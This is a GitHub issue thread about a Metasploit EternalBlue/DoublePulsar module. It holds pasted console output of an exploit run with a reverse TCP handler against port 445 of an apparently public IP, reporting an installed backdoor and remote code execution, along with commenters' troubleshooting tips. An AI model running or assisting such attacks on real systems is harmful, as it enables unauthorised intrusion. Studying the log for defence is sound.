Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

Why is here no error, but session wasn't created? #93

Open colorblindpentester opened 5 years ago

colorblindpentester commented 5 years ago

[] Started reverse TCP handler on 10.0.2.15:4444 [] 52.62.113.135:445 - Generating Eternalblue XML data [] 52.62.113.135:445 - Generating Doublepulsar XML data [] 52.62.113.135:445 - Generating payload DLL for Doublepulsar [] 52.62.113.135:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 52.62.113.135:445 - Launching Eternalblue... [+] 52.62.113.135:445 - Backdoor is already installed [] 52.62.113.135:445 - Launching Doublepulsar... [+] 52.62.113.135:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created.

Attacking: Windows 7 Professional

yoerithor commented 5 years ago

probably patched in that version

GetRektBoy724 commented 5 years ago

yap you right @yoerithor !!

GetRektBoy724 commented 3 years ago

Try to run the auxiliary scanner first